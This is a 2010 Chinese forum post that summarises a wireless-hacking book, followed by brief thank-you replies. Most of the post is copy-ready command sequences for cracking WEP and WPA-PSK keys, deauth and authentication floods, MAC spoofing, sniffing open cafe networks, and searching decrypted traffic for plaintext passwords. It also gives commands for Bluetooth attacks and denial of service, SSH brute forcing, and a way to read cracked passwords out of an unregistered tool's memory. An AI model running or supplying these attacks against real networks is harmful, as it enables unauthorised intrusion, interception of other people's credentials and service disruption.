wrczeus 发表于 2010-2-10 10:59

《无线黑客傻瓜书》读后总结

这本书看了一个星期,终于看完了,现把书上的精华总结成如下内容,条理化知识点。

以下所有操作均在BackTrack 4中进行。


无线WEP加密P解:

注入P解:

ifconfig

ifconfig –a

ifconfig wlan0(无线网卡) up

airmon-ng start wlan0

airodump-ng mon0

airodump-ng --ivs –w ivsfile –c 频道 mon0或

airodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon0

aireplay-ng -3 –b BSSID –h Station mon0

aircrack-ng ivsfile-01.ivs

虚连接P解(适用于无客户端连接APP解)

ifconfig

ifconfig –a

ifconfig wlan0(无线网卡) up

airmon-ng start wlan0

airodump-ng mon0

airodump-ng --ivs –w ivsfile –c 频道 mon0或

airodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon0

aireplay-ng -1 0 –e SSID –a BSSID –c Station mon0

aireplay-ng -2 –p 0841 –c ffffffffffff –b BSSID –h 自己的MAC mon0

aircrack-ng ivsfile-01.ivs


还有傻瓜式P解软件SpoonWEP2,SpoonWEP2中的Chopchop和Fragment来进行无客户端P解,P解时客户端MAC栏留空。


WPA-PSKP解

ifconfig

ifconfig –a

ifconfig wlan0(无线网卡) up

airmon-ng start wlan0

airodump-ng mon0

airodump-ng –w capfile –c 频道 mon0

aireplay-ng -0 10 –a BSSID –c Station mon0 //Deauth洪水攻击使合法客户端掉线捕获其与AP连接时的握手数据包

aircrack-ng –w Dic capfile-01.cap或

cowpatty –f Dic –r capfile-01.cap –s SSID

cowpatty –d HashTable.Hash –r capfile-01.cap –s SSID

傻瓜式P解软件SpoonWPA。

BT4下自带的字典文件:/pentest/passwords/wordlists/darkc0de.lst


字典文件的生成和上传

在windows下使用生日密码生成器和社会工程学密码生成器 等生成字典。然后在BT4下开启Tftp、SSH或使用U盘传输。


BT4下开启Tftp:Services—TFTPD—start TFTPD

在Windows的CMD中运行 tftp –i IP put **.dic


BT4下开启SSH:Services—SSH—start SSH

Windows下使用CuteFTP新建连接:File--New—SFTP(SSH2)连接。使用BT4的root用户登录,前提是设置、修改密码:passwd root


AP限制MAC时的解决

当AP限制IP连接时,可以伪造为合法用户的MAC,关于AP连接的用户以及MAC,可以使用airodump-ng mon0查看。在BT4下修改MAC的命令为:

ifconfig wlan0 hw ether NewMAC


关闭SSID广播的AP探测:

1.   Deauth攻击:

airodump-ng mon0

aireplay-ng -0 10 –a BSSID –h Station mon0

2.   抓包分析

Omnipeek

Tcpdump –n –e –vvv –i 网卡名

3.   暴力P解

Charon 1.1暴力P解


无线加密数据包的解密


使用airodump-ng –w capfile –c 频道 mon0 捕获数据包并P解AP的密码 ,使用Cain的Cracker项在802.11Capturea导入解密。解密完后的数据包用Wireshark打开即可分析。

Filter:DNS   DNS解析数据包

Filter:HTTP    WEB访问数据包

Filter:msnms   MSN

Ctrl+F查找pass可以寻找一些明文的密码,如论坛等使用非SSL连接的账号。

使用airdecap-ng解密:

Airdecap-ng –b BSSID –e SSID –w 密码 ***.cap


咖啡馆中无线数据截取(开放式无加密AP)

1.Airodump-ng –w data –c频道 mon0

2.使用WireShark打开分析


BT4下的渗透工具:

nmap –sP IP/24      判断C段下存活的主机

nmap –vv –sS IP/24 –p Port    扫描指定端口是否开放

nmap –vv –sV IP –p port   指定端口的详细信息。。。

namp –O IP/24    判断主机的系统版本


GUI 版nmap:Zenmap


Amap使用:amap –B IP port

Nbtscan(扫描Windows网络NetBios信息):

nbtscan –v –s : IP/24

nbtscan –r IP


DNSWalk(指定域名的DNS探测):./dnswalk XXX.com.


HydraP解工具(backtrack—Privilege Escalation—PasswordAttacks—OnlineAttacks)

BruteSSH: ./bruthe.py –h IP –u Username –d Dic

Metasploit3使用
无线D.0.S


Auth Flood 攻击(Authentication Flood Attack,身份验证洪水攻击)

airmon-ng start wlan0

airodump-ng mon0

mdk3 mon0 a –a BSSID

对所有的AP攻击:mdk3 mon0 a


Deauth Flood 攻击

mdk3 mon0 d –c Channel

图形化D.O.S攻击:Charon


当受到攻击时,使用Wireshark抓包可以看到异常信息。


WPA-PSK高速P解

1.       WPA-PSK PMK Hash TablesP解

Cowpatty –d HashTable.hash –r ***.cap –s SSID

Hash Tables的制作: genpmk –f Dic –d SaveHash –s SSID

2.       GPU辅助高速P解

使用EWSA(Elcomsoft Wireless Security Auditor,无线安全审计工具)导入WPA握手数据包P解,未注册版P解后密码只显示2位,但是可以使用WinHex查看(ALT+F9)ewsa进程的内存,搜索 密码的前两位。就可以看到完整密码。

3.       分布式P解


AP的伪造

把AP的MAC改成目标AP的MAC

网卡软AP


伪造大量虚假AP信号:

随机SSID:mdk3 mon0 b –g –c 频道

指定SSID:mdk3 mon0 b –g –c 频道 –n SSID –s 速度


War-Driving

热点地图绘制

Windows Mobile系统智能手机配合GPS模块,使用WIFifofum探测,把结果导出为kml(Google Earth可识别格式),在Google Earth中打开即可完成热点地图绘制。


Netstumble


蓝牙Hacking

Windows下的Blue Soleil工具

BT4:

hciconfig 查看蓝牙适配器

hciconfig hci0 up 载入蓝牙适配器

hciconfig hci0 class 蓝牙适配器详细信息


hcitool(扫描蓝牙)

hcitool –i hci0 scan

BTscanner(扫描蓝牙)


蓝牙攻击:

BlueBugging (适用于BlueTooth V1.1的手机)

Bluebugger工具:

Bulebugger –a HD_Addr info


BlueJacking

实现方法:使用手机伪造假的名片,里面写上消息内容然后发送。


HD_Addr修改:

Bdaddr工具

bdaddr –i 蓝牙设备名 新HD_addr


蓝牙D.O.S

l2ping工具(蓝牙连通性测试工具),改变其发包数据包大小,使目标设备拒绝服务

hciconfig

hciconfig hci0 up

hcitool –i hci0 scan

l2ping –s 10000 –目标MAC


不可见状态的蓝牙通过RedFang暴力P解(暴力尝试所有的HD_Addr)(概念性的软件)

./fang –r ************-############ -s

暴力P解************-############的蓝牙设备

./fang –l 各厂商BD_Addr分配


WifiZoo使用

./wifizoo.py –c Capfile

访问127.0.0.1:8000即可登录Wifizoo管理页面,查看数据包分析的详情

tlwxs 发表于 2010-2-10 11:16

传说中的沙发?

yuanbin0710 发表于 2010-2-10 11:35

我还正在学习中,先收藏。

wo2rikku 发表于 2010-2-10 12:42

总结的很好~谢谢分享

天鹅爸爸 发表于 2010-2-10 18:31

分享成功的经验

yggdrasil2008 发表于 2010-2-12 14:43

呵 ....正在努力学习当中....

donglianjun 发表于 2010-2-14 14:51

Exellent digest

neglinhai 发表于 2010-2-20 23:51

谢谢看了!

na2650945 发表于 2010-2-20 23:54

谁有电子的。
借来看看。

applehdh 发表于 2010-3-5 19:27

LS的 估计不可能的 会被管理员和谐的
呵呵 其实也不贵 21块 快递再一点
我们也支持一下超级版主这么多年对我们的解答哈

实习魔法师 发表于 2010-3-6 00:31

回复有理,顶贴无罪

tuilly 发表于 2010-3-8 18:56

顶起~~~~~~~~~
页: [1] 2 3
查看完整版本: 《无线黑客傻瓜书》读后总结